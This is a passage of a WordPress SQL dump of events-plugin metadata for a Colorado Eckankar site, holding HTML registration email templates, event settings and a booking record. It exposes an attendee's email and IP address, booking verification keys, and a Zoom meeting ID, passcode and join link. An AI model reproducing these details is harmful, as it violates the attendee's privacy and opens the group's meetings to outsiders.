0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(165088,266815,'mec_event_status','EventScheduled'),(165089,266815,'mec_moved_online_link',''),(165090,266815,'mec_cancelled_reason',''),(165091,266815,'mec_display_cancellation_reason_in_single_page',''),(165092,266815,'protect_children',''),(165093,266815,'passster_activate_global_protection',NULL),(165094,266815,'passster_activate_protection',NULL),(165095,266815,'passster_protection_type','password'),(165096,266815,'boldgrid_hide_page_title','0'),(165097,266815,'_thumbnail_id','266816'),(165098,266815,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(165099,266815,'boldgrid_in_page_containers','1'),(165101,266815,'_dp_original','266545'),(165102,266815,'_edit_lock','1655857087:2'),(165103,266815,'_edit_last','2'),(165104,266816,'_wp_attached_file','2022/06/hu-water-2.jpg'),(165105,266816,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:705;s:6:\"height\";i:396;s:4:\"file\";s:22:\"2022/06/hu-water-2.jpg\";s:8:\"filesize\";i:60517;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"hu-water-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11296;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"hu-water-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5773;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"hu-water-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16735;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"hu-water-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26899;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"hu-water-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19429;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"hu-water-2-300x396.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:396;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22038;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165106,266817,'mec_transaction_id','NZS19398'),(165107,266817,'mec_user_id','1000021'),(165108,266817,'mec_verified','1'),(165109,266817,'mec_verification_key','3919c601395727152661073ff9225acf'),(165110,266817,'mec_cancellation_key','dbbf60972fb97c7e81ee6f0532f8c4ec'),(165111,266817,'mec_confirmed','1'),(165112,266817,'mec_event_id','266815'),(165113,266817,'mec_date','1656844200:1656891000'),(165114,266817,'mec_ticket_id',',1,'),(165115,266817,'mec_booking_time','2022-06-21 18:09:16'),(165116,266817,'mec_all_dates','a:0:{}'),(165117,266817,'mec_other_dates','a:0:{}'),(165118,266817,'mec_attention_time','1656844200:1656891000'),(165119,266817,'mec_attention_time_start','1656844200'),(165120,266817,'mec_attention_time_end','1656891000'),(165121,266817,'mec_book_date_submit','20220621180916'),(165122,266817,'mec_booking_location','118'),(165123,266817,'mec_ticket_price_1','0'),(165124,266817,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:4:\"Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(165125,266817,'mec_price','0'),(165126,266817,'mec_gateway','MEC_gateway_free'),(165127,266817,'mec_gateway_label','Free'),(165128,266813,'_edit_last','2'),(165129,266818,'_wp_attached_file','2022/06/sound-of-soul-2.jpg'),(165130,266818,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:701;s:6:\"height\";i:422;s:4:\"file\";s:27:\"2022/06/sound-of-soul-2.jpg\";s:8:\"filesize\";i:61540;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"sound-of-soul-2-300x181.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16030;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"sound-of-soul-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9038;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"sound-of-soul-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23177;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"sound-of-soul-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33296;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"sound-of-soul-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25247;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"sound-of-soul-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26374;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165131,266813,'_thumbnail_id','266818'),(165132,266820,'mec_color',''),(165133,266820,'mec_location_id','129'),(165134,266820,'mec_dont_show_map','0'),(165135,266820,'mec_organizer_id','1'),(165136,266820,'mec_read_more',''),(165137,266820,'mec_more_info',''),(165138,266820,'mec_more_info_title',''),(165139,266820,'mec_more_info_target','_self'),(165140,266820,'mec_cost',''),(165141,266820,'mec_currency','a:0:{}'),(165142,266820,'mec_additional_organizer_ids','a:0:{}'),(165143,266820,'mec_additional_location_ids','a:0:{}'),(165144,266820,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-10\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165145,266820,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165146,266820,'mec_certain_weekdays','a:0:{}'),(165147,266820,'mec_allday','0'),(165148,266820,'one_occurrence','0'),(165149,266820,'mec_hide_time','0'),(165150,266820,'mec_hide_end_time','0'),(165151,266820,'mec_comment',''),(165152,266820,'mec_timezone','global'),(165153,266820,'mec_countdown_method','global'),(165154,266820,'mec_public','1'),(165155,266820,'mec_start_date','2022-07-10'),(165156,266820,'mec_start_time_hour','10'),(165157,266820,'mec_start_time_minutes','30'),(165158,266820,'mec_start_time_ampm','AM'),(165159,266820,'mec_start_day_seconds','37800'),(165160,266820,'mec_end_date','2022-07-10'),(165161,266820,'mec_end_time_hour','11'),(165162,266820,'mec_end_time_minutes','30'),(165163,266820,'mec_end_time_ampm','PM'),(165164,266820,'mec_end_day_seconds','84600'),(165165,266820,'mec_repeat_status','0'),(165166,266820,'mec_repeat_type',''),(165167,266820,'mec_repeat_interval','1'),(165168,266820,'mec_repeat_end',''),(165169,266820,'mec_repeat_end_at_occurrences',''),(165170,266820,'mec_repeat_end_at_date',''),(165171,266820,'mec_advanced_days','a:0:{}'),(165172,266820,'mec_in_days',''),(165173,266820,'mec_not_in_days',''),(165174,266820,'mec_hourly_schedules','a:0:{}'),(165175,266820,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165176,266820,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(165177,266820,'mec_fees_global_inheritance','1'),(165178,266820,'mec_fees','a:0:{}'),(165179,266820,'mec_ticket_variations_global_inheritance','1'),(165180,266820,'mec_ticket_variations','a:0:{}'),(165181,266820,'mec_reg_fields_global_inheritance','1'),(165182,266820,'mec_reg_fields','a:0:{}'),(165183,266820,'mec_bfixed_fields','a:0:{}'),(165184,266820,'mec_op','a:0:{}'),(165185,266820,'mec_fields','a:0:{}'),(165186,266820,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 